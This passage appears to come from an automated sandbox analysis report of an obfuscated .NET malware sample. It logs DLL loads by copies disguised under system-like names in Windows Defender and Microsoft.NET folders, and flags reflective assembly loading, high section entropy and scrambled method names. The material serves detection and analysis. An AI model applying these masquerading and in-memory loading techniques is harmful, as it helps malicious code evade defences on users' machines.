            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: amsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: winnsi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rasman.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rtutils.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Directory created: C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382
            Source: XPC5PMKegV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: XPC5PMKegV.exe Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: XPC5PMKegV.exe Static file information: File size 1253376 > 1048576
            Source: XPC5PMKegV.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12e600
            Source: XPC5PMKegV.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs .Net Code: doBJWyeqP0 System.AppDomain.Load(byte[])
            Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs .Net Code: doBJWyeqP0 System.Reflection.Assembly.Load(byte[])
            Source: XPC5PMKegV.exe, wB47m2rBZFiZqaQq5LQ.cs .Net Code: doBJWyeqP0
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AA810 push edi; retf 32_2_00007FFD347AA816
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD347A5A95 push ds; retf 5F4Bh 41_2_00007FFD347A5B0F
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD347A0F23 push E8FFFFFFh; ret 41_2_00007FFD347A0F39
            Source: XPC5PMKegV.exe Static PE information: section name: .text entropy: 6.988119508345658
            Source: StartMenuExperienceHost.exe.0.dr Static PE information: section name: .text entropy: 6.988119508345658
            Source: System.exe.0.dr Static PE information: section name: .text entropy: 6.988119508345658
            Source: xMLVfJVxhYAkoCJ.exe.0.dr Static PE information: section name: .text entropy: 6.988119508345658
            Source: xMLVfJVxhYAkoCJ.exe0.0.dr Static PE information: section name: .text entropy: 6.988119508345658
            Source: XPC5PMKegV.exe, OlwfVgUoUd7sNOSQ8ec.csHigh entropy of concatenated method names: 'kuQDiklHcKuk6JlXpwp', 'upoqHklJRfRtN0Lh83I', 'T9TUKGl3mWBemSliOMa', 'ohSFnPlRv5DKlrqUEUC', 'M4rdfLB1bk', '_71i', '_951', 'PHEd0gZarL', 'cEfdxjX4Ok', 'cPWd91nno1'
            Source: XPC5PMKegV.exe, jdiRBg61JN4QAi2oOJT.csHigh entropy of concatenated method names: 'BQbwHsVpC7', 'uhXOFPHnkrQMt7gagwE', 'hYvC6pHoIbiR87a3F2h', 't47FiaHuHDKZmA3VPDC', 'WmP6H7HjWSMY6TbiPHp', 'bh7yIMHfyukRbwZLdc4', 'amy', '_7WJ', '_3TA', 'B28'
            Source: XPC5PMKegV.exe, HDV9hypI26pClCBBdee.csHigh entropy of concatenated method names: '_364', 'kDNIVjC5xC', 'xinIn2AXNA', 'K7aIM0Rbfg', 'J98IQytiSi', 'W9vImP80qG', 'AdKIk5hPt6', 'PiGtALobq0dvHVD8as1', 'PgcWJJoXggB2rxB9bGo', 'DanMiDooZC0Unv8MQWo'
            Source: XPC5PMKegV.exe, ye8aWNTqk0b1FcRsZ1n.csHigh entropy of concatenated method names: 'A9l', 'vy1bG0DnFZ', 'yyivtghAKC', 'DWpbQuFbhC', 'RyYY6Ku8NCPtkYbAvmH', 'axCvGHuG4qXCIsgnguk', 'gFjwm8u47vblwAkxMof', 'rWa1S4uqRiexWPDPI25', 'GLTOr6ukh6jJ3WuQlqH', 'aNJrrXu2cr4QnJ7w5FI'
            Source: XPC5PMKegV.exe, SLLPugr8pKR7lGVhAUp.csHigh entropy of concatenated method names: 'tFrc3efu53', 'T2GcZNSKXO', 'EmwcdvUmgw', 'g0mjMd7CoepsiBRyno8', 'sq8K1S7DEiCClQg1Jbm', 't6eQ0v7sG60REJ7DPFr', 'UM8ciT71WuWmKUvtBWi', 'LEf1TO7Qb4e3akKgNPs', 'KqIOQZ7vPvc4IlUc372', 'zxjj2T7FViYGAFENepL'
            Source: XPC5PMKegV.exe, kIPDhH6Eh9gEOt304bk.csHigh entropy of concatenated method names: '_6L9', '_7WJ', '_5E1', 'B28', 'AipQ323zxfxQw3VOluy', 'S2c24QRqEiNwMv82IJV', 'pDgsYSRkFM59v8r3neG', 'yQScivR8AenBYc89moV', 'BnUvrTRGPLvMTTtpVj6', 'A2hxaZR4QAA6816v6Gl'
            Source: XPC5PMKegV.exe, THa8RgTPonEo7fqnLPu.csHigh entropy of concatenated method names: 'l8M4Bc8CyJ', 'xyC4foT82E', 'jrH400nmL6', 'iFhp3eMIPVJFWDpXelK', 'ildeboMV7Uty5DWycA9', 'hoY1T8MenxcDcGSWIHs', 'S8Sex3Mw4v0Ljc1Dbhe', 'zyK4CLLnJg', 'X0O4ijGFD4', 'D9g4OKHttg'
            Source: XPC5PMKegV.exe, X5lCJea0qEIjZsFB0lI.csHigh entropy of concatenated method names: 'm9NHuEddHds04', 'pTjZSQYAFE8CFm1b1yg', 'tBUsIcYMwHkVg4AvNMm', 'j6tpFuYLwNq4DKDed5Q', 'lRY6BaY07HbXC8NqQ4P', 'Ld96E0Yu8OlPS8NCqli', 'dZDymAYI6nWpvwoDHGf', 'zKR6TfYw6NvOZgilP4w', 'uKq2hYYj6fZLqOLMqWX', 'VFW9wOYnQm2xs01NY32'
            Source: XPC5PMKegV.exe, i1jdsTLl85OCES0PtGu.csHigh entropy of concatenated method names: 'Fev3j297h1', 'gQg3KLj2AW', 'OOt', '_8Md', 'qrX', '_1N5', 'x8o', 'xxn3aN1WdA', '_2m4', 'v4c'
            Source: XPC5PMKegV.exe, exil7e6cwtaPeLExwKG.csHigh entropy of concatenated method names: '_93E', '_7WJ', '_855', 'B28', 'N3hRDwrtPy6pDwmWKpZ', 'jeOidFrhPmLItC8Iw4r', 'Fb4UK1rdjSsd8rxIeZH', 'UDXObhrlZCrxZqKncC9', 'oIfdn6rmDThkhqKyXF4', 'ko0RQxrY1hMXxB5ZCEp'
            Source: XPC5PMKegV.exe, bprgVi6la5IXptQf6Vi.csHigh entropy of concatenated method names: 'gipcmjt3ae', 'ECncknawPg', 'fNccYlCyij', 'qpRETa77DrAgiN2vLdO', 'Xu4vHn7H4bwfGtv9OWc', 'KPANeI7JUUIpUAYjesb', 'Gtksgy7xpZFcBf6KNnw', 'wFgquW7ECMBNMaTr7CA', 'YVKXFJ7PGNoVlsSnKMt', 'cy7kF77pnQTylNUoyxi'
            Source: XPC5PMKegV.exe, T1JNqcgrHbtUAc4YqQ.csHigh entropy of concatenated method names: '_695', '_7WJ', '_472', 'B28', 'TylmMb2BDJXTi2EavI0', 'hOfoDE2rU9gtK6MQVlm', 'm7jPKs23xaTfvPpvhJ5', 'JKsrTT2RGwMjx12egdi', 'EFd59U2HEqBPHkyNMRY', 'AJIS4e2JmxAUfxUKFMN'
            Source: XPC5PMKegV.exe, K0nqIZTKp3pvByNf7CQ.csHigh entropy of concatenated method names: 'D1PPNEjlqlycPAjqwWa', 'n5jW07jm2cEuge2k8AD', 'vrFYLNjhxoTvYsDmeHF', 'L8gcEKjdxasgBRwXBrZ', '_26G', 'z33', 'kMxvO35rxg', 'w2qvbdRpy2', '_987', 'mc1vTw3t6o'
            Source: XPC5PMKegV.exe, HwlW5eThgMUHaYWFXQ4.csHigh entropy of concatenated method names: 'sqV4eH8ceg', 'Enb4uwF5gA', 'EWy4Eq0ond', 'gL2xJDMgLcHnnUNtljc', 'uj0ls5MOC8Q1kJqd3Yh', 'II3QAHMURmBu3lZx8Kl', 'dYMkADMTtZvAMAHSPfZ', 'Gso6kYMNHWu4tFmweGO', 'FVC6fSM67nq0pURI96J', 'KxjPQ5MiHhdMqljkhYf'
            Source: XPC5PMKegV.exe, onc0N3TSIib8Dtmf3H6.csHigh entropy of concatenated method names: '_7n5', 'iS6', 'IkmbuiFJVl', 'OSX', 'W2AbmLQE2v', 'oiV92muiGngTu8XqMgF', 'fmMF5OuyZf934NsHPg4', 'n406yOuzxePoglRtRNL', 'Iu5p1HjqUdoPoiHpRNN', 'BThaUtjkOvm5Q0fxp1N'
            Source: XPC5PMKegV.exe, bDZaFDUMwF69yLGvilu.csHigh entropy of concatenated method names: 'VE0dyygSkF', 'ra3dvNJRPk', 'p9vdD9AVY6', 'U1s', 'yYS', '_79P', '_5lh', 'j46', 'J63', 'Wned1CT082'
            Source: XPC5PMKegV.exe, RCS9MN6Fmifw4GBeIY9.csHigh entropy of concatenated method names: '_95T', '_7WJ', '_5Kd', 'B28', 'gDPYTm3kx2QAZBaGSMh', 'yDR0TB389H1MCb2QReq', 'IiZnGF3GXe8u7Qs90VK', 'r9OSnx34AhPRRhyDrC2', 'BwDI1q32QWciSXrKQCM', 'NVnykh3BvQi7M8sfijS'
            Source: XPC5PMKegV.exe, TbNhVJUyCnnERU7Xiib.csHigh entropy of concatenated method names: '_9Xh', 'pA2', '_5v5', '_4m5', '_1I6', 'ynJ', '_15m', 'V8n', '_753', 'c15'
            Source: XPC5PMKegV.exe, d8ilVI6iXvaEFUhlrfp.csHigh entropy of concatenated method names: '_4wN', '_7WJ', '_526', 'B28', 'Kba65O3sHSD5C0DJRC5', 'Ljrcbn31lV3gmw1eadW', 'KGuyX93Qsvin0MXYUhr', 'vIu5R43vIJlBdolfChD', 'TCMh4Q3thrsc1daKh0E', 'dvu0Nx3hq1DBosH5xmU'
            Source: XPC5PMKegV.exe, lSWdvHLBf90iO6VyMDw.csHigh entropy of concatenated method names: 't11Yny2aeA', 'w5AYMiuQnB', 'pulgNlsz2skhlekKUgD', 'S8QugC1qMpgXsWu79Z7', 'DHGTZm1k4aVAsa5O58J', 'pG7nUa18vWAnijp4M9e', 'wlJ0dG1G76po8SxH73L', 'qV0IVv14FULPs4C4sUP', 'zTfyjH12NJkJuv0YqT9', 'm3JDuZ1BpimW6ebFXPU'
            Source: XPC5PMKegV.exe, N7KIuaSn0C2OaIkIcD.csHigh entropy of concatenated method names: '_321', '_7WJ', '_726', 'B28', 'Vonuj52XxaCHybhuVFf', 'NmRmgZ259JVQKyMeYgm', 'Fi64wY2S2mbaQJT1hQm', 'haUREo2FE23epVxc4iI', 'gmAnXw2ZZguWay1j0vE', 'H4F0Ku2CS6h7qxjZ9lw'
            Source: XPC5PMKegV.exe, WRp7jS6yDNlWjHCys6b.csHigh entropy of concatenated method names: '_1I3', '_7WJ', 'Aa7', 'B28', 'rCvuAa391vspjZdigri', 'NIgQyA3a0ujlGFI1PSX', 'WiZpoE3W258LTEqxryb', 'Orpaad3gjM76gdZ9r7i', 'DT4icJ3ODWPZRBbTOb2', 'dyDkOJ3UiTp6oGUQs14'
            Source: XPC5PMKegV.exe, W2G0gDTF8W9Ih1wSuug.csHigh entropy of concatenated method names: 'lQt4249fxa', 'C9Z4HUBhwW', 'jC94FdJClF', 'KkF460Xfsc', 'SC34LugP6t', 'K4rXxILJx8owy9bJN90', 'QWSFWOL7w8XsqbQtmpv', 'SKcU6sLRn25UXF78vUx', 'i9cK7DLHjAUh6WbGMjT', 'tIob9JLxYlCMHju52nC'
            Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.csHigh entropy of concatenated method names: 'LHWbEuYFS0GnZMKK5A6', 'WLtca6YZCSXDSOZ4xgY', 'A8MvTGY5brfY9ZmhA98', 'MRFWbiYSpXkpc3d2Jtl', 'blVRWeNs3I', 'M6NreiYsCpI1JoIQdXq', 'i6js3tY1pK5nHc7wYqG', 'FgV9TnYQZC2EHghHd8k', 'TyExi4YvewWsJciCr3u', 'F1X8NvYt0Jvm2fL4QjQ'
            Source: XPC5PMKegV.exe, tmoy8rLYPKw2P7OamUs.csHigh entropy of concatenated method names: 'x4nY2ulsWn', 'EJPYHgxGFF', 'YmlYFD43P6', 'QVMY6osbhu', 'naJYLwRD23', 'J57YUpZSCh', 'xYYtXT1TLP0QXpXqMaZ', 'nAXlcE1O5C4tsTRlHSo', 'QiDbYf1U6YqQqjQmCeO', 'trJTcl1NMV7F9l0lgd6'
            Source: XPC5PMKegV.exe, dEV9PYayGfcqGk0XZux.csHigh entropy of concatenated method names: 'PsvRYW42JN', 'GWfR3wV9iH', 'T1VRZCbOS5', 'NdPRdNbYaB', 'DrvRjOO1LX', 'NkJRKyZU5h', 'DQaRanoBam', 'EaARPgdZsE', 'oHsRRlYAZ0', 'wkHRpbeWMY'
            Source: XPC5PMKegV.exe, Ra53WHDsyCfioLYDgw.csHigh entropy of concatenated method names: 'iW5', '_7WJ', '_5CE', 'B28', 'pFo6kP4J05waL3egWJT', 'whGZ6h47Cn4j3ruujQX', 'bX6OYJ4xKki4dJec7WR', 'r9JI0C4EwvVYcSIWeWt', 'iWRKC14PsUcGRC79h82', 'mdp48d4pP1pwIDpmgkB'
            Source: XPC5PMKegV.exe, eCStXIr9xxQuvqyW8NK.csHigh entropy of concatenated method names: 'kKlJUbp9e9', 'yh5J7uajNb', 'E3AoHKPjfEFiUlCry5D', 'XSnTyGPnMmIKygQOHrp', 'MC2e8vPowwppQOGUn9M', 'Hsc74hPf5B9YGX5ol0h', 'gIFK81PbjbiE72M3OPY', 'ejTGbDPXujrcTqFOdwt', 'QOVJibP5iOWjS4FpGSs', 'CZ97C5PSXSOdSkcu1oI'
            Source: XPC5PMKegV.exe, TSdLTEpB6fHDtZFMVqW.csHigh entropy of concatenated method names: '_912', 'SuF', '_451', 'BdL', '_782', 'gY9', 'q92', 'ZYw', '_35s', 'I83'
            Source: XPC5PMKegV.exe, yEdGe8dL8ulrEXaocs.csHigh entropy of concatenated method names: 'P1z', '_7WJ', '_5Ch', 'B28', 'BSOkyt2pmH2RPf4DPIg', 'nxgyC32ckxWL14GBkKl', 'drjUwh2VxRosqaDAtcJ', 'pZ4txd2erD8Hw8ohD4E', 'TNVOn32IwCiBPRBuNup', 'oRvQ3c2wB0LPgkd14t9'
            Source: XPC5PMKegV.exe, dH1Xc1LAPMZxLIQlI8T.csHigh entropy of concatenated method names: 'uUe3XHOiPp', 'xT83SubndP', 'LVF3s2bPHl', 'UIP3rvPY6O', 'CvO34IKcwQ', 'VNg3yHY9ao', 'XwX3vNV6Kh', 'duN3DiNOqv', 'PL531DdWLn', 'Cdw3IWa8eG'
            Source: XPC5PMKegV.exe, UiVNbAql4hhBLby4Ts.csHigh entropy of concatenated method names: 'sd4', '_7WJ', '_2zX', 'B28', 'FLaN8V4elf42Cqd3Giv', 'SwgLIN4IjImTBBb6gbF', 'PmAb1A4wQexGGFXlcgV', 'b1Jkeb4ASGdHAsIK2nT', 'i4alUB4MfAoYXJNYAR3', 'dMJdBh4LAohvfT3DLps'
            Source: XPC5PMKegV.exe, pnNUTeTzesg7nAYyeVY.csHigh entropy of concatenated method names: 'HqQvjYvmer', 'pZ4vKJVBmF', 'uklvaAc2so', 'yM2jpUj9weBx8ZZsAGH', 'pUNj6ZjaVUFsiZ6RFEx', 'NwYuvhjYBku0E6rlDUQ', 'uF6x9FjK1v6rMxk28Mm', 'HichHNjWvRlGonadMua', 'aAiSshjg4xHlrmsOClH', 'obSs79jOTnEMStgj4mn'
            Source: XPC5PMKegV.exe, m7Yx3oK0kYe6AHj9lL.csHigh entropy of concatenated method names: '_1h5', '_7WJ', 'TyQ', 'B28', 'qxMtCD2YWgs78ciTnxx', 'zTWxvh2KnmqpQreLI7r', 'bFgLsH29HTwfUsYG70r', 'lLMyv12af0Po5dbauvt', 'E6Is5N2WkfQedYctsFG', 'RpV8n82gt7Y7DYDUQXe'
            Source: XPC5PMKegV.exe, vf2M6Sp9QJNAD4s7aUB.csHigh entropy of concatenated method names: 'eQRIXTH4je', 'qsJISsCagk', 'JV2IscFRu5', 'f7o4hDoLts6WfEVw4pm', 'Wbi45Wo0jdPE1ZiTWHx', 'q5HUV1oAq4AcQEghFyg', 'W5mUidoMjL58fcqjK1s', 'UpkXgmouoxwfY17aP4M', 'lFEib1ojAs29qMReFw6', 'XiLnq7onSg5fMyDf7rp'
            Source: XPC5PMKegV.exe, OP7JyVLE6htJ0UxVpp3.csHigh entropy of concatenated method names: 'BS0Ygy8Ahr', 'p2yYqv4Dka', 'UrDYGloXnF', 'agJYAdZnqY', 'WgcYlRjXEW', 'saweVn1Cwu6pjOypioE', 'XAjdvE1FG5534QjF0nD', 'OrGHNY1Zo1L9STDSiyG', 'Eci6O91DoF123v9mrHO', 'mWqGvC1sstHX8p2hKVt'
            Source: XPC5PMKegV.exe, zdFAVE6SWJ9Tbr5etQT.csHigh entropy of concatenated method names: '_3B5', '_7WJ', 'D4o', 'B28', 'rb5NH9JW10QNl6ADSGH', 'N4wOpJJgedqZYIyYwP9', 'fQAiXxJOdo1c7bsPPE5', 'TCkRrUJUxw5eqYfe7b5', 'oYWL1DJTeA4WqwOpFmc', 'tVODxBJNFT41op8ZgP2'
            Source: XPC5PMKegV.exe, yaLo7dN4I4Wc81sZuQ.csHigh entropy of concatenated method names: '_8k1', '_7WJ', 'B73', 'B28', 'LHkdh6GNxfoqbyefvW2', 'qQW5UaG6eLApA9If5tr', 'BMrqM0Gi1o3OOR8qlfG', 'YIC0VwGya8X4sHTYryM', 'Ua4XnyGzbRg6f3AFXuC', 'gj65ZU4qXuAAU4pkD8U'
            Source: XPC5PMKegV.exe, e3ydsorNghN6ua9ppro.csHigh entropy of concatenated method names: 'FnTs4JpgTt', 'aRcsy6C6TP', 'zdbQc1Iq6EeRdm0s34W', 'Mwho8yIkiymr0rF9Z5d', 'hWetuZeySmpgoL3rajP', 'nfHEIyezUlmjeBbFqsf', 'CQWsOie6wJ', 'gXowVlIBbVbj3x65rs8', 'p7SLeRIrkC1Q2T2BLcc', 'Fs808qI4srZ3VwtwWaS'
            Source: XPC5PMKegV.exe, lKCHso6XXYUPE6pcQcJ.csHigh entropy of concatenated method names: 'SRCcD92L0k', 'EAKc1aV6YW', 'y6RO9BJxbnj1kLoWwIg', 'WrhdYDJJjoP8ttZQqFn', 'cB7cLqJ7yOKqsB5p8d7', 'VCuG0oJEucdLP35hrJR', 'D1l6dPJPU6xu0LsQcAg', 'rfKRVYJpDZtsWvpWDkY', 'OkUZ6NJcoN862WEAWOC', 'W0PyRqJVuBOYEaxKyHx'
            Source: XPC5PMKegV.exe, Oi1qX5rn54HA5LWst2e.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'aWNSf1tEOP', 'uW8S0g6Emb', 'TWPSxS2vVS', 'TLRS9ZQDM9', 'TpXSgvWE8W', 'gcyi4DePjeDOtkpbmR0', 'Y7vFFxepKA2YtY8jT3b', 'p13IK4exPrKUVg0G6Re'
            Source: XPC5PMKegV.exe, XWgth7zAKmQlfDdxWZ.csHigh entropy of concatenated method names: '_4W2', '_7WJ', '_6R7', 'B28', 'sX1oH2B4M8qO1XKyhQ5', 'iXNPBmB2BMmuLSQpvMk', 'iADGb2BByqax1UMmDcD', 'JAwf81BrZN0FdyYuMel', 'v7eQPuB3awao9B2BSBI', 'Mhw5qYBRxhC3Fpe4Abb'
            Source: XPC5PMKegV.exe, c8ibLBUi5NXBa1AOvxw.csHigh entropy of concatenated method names: '_6u4', 'mQ9', 'b08ZYHKsW7', '_639', '_132', '_775', 'OOV', 'F1i', 'M4T', '_7dM'
            Source: XPC5PMKegV.exe, mTGbTepf5luI9wGdk1Y.csHigh entropy of concatenated method names: 'JwxIBb4Bch', 'C9tIfTdJ8s', 'uxZI0hFGl7', 'dZIIx5K6CO', 'XETI9lMoVl', 'Kw6LsiohtnEOZSoX3l4', 'd3bLhtodb2y3ujFkTe7', 'kj3s8yovfsnyQkR9LHu', 'YRIDA8otauK3DNmlPDJ', 'uBn61HolXxy2Vb4OVAd'
            Source: XPC5PMKegV.exe, v8bQYK6gGtbc7JJ4RgR.csHigh entropy of concatenated method names: 'J96', '_7WJ', '_95G', 'B28', 'L2yKhqJLWFbVqVrJnSs', 'voVIiZJ0H4FEyKVGK00', 'bXI8XuJuIOHOBIS5Ey7', 'PSxuVHJjKA2R0mmsqSK', 'eF0xXSJn3UESQPW5Zwr', 'FwsXnmJopM7SE9ASalR'
            Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.csHigh entropy of concatenated method names: 'C7b3NkqYAc', 'Gv53hxOwxG', 'QHr3oyBkEY', 'UqV3eAqEeT', 'Dwd3uo4JMp', 'ViD3ES93Xo', '_613', 'IO3', 'Mp1', '_7FY'
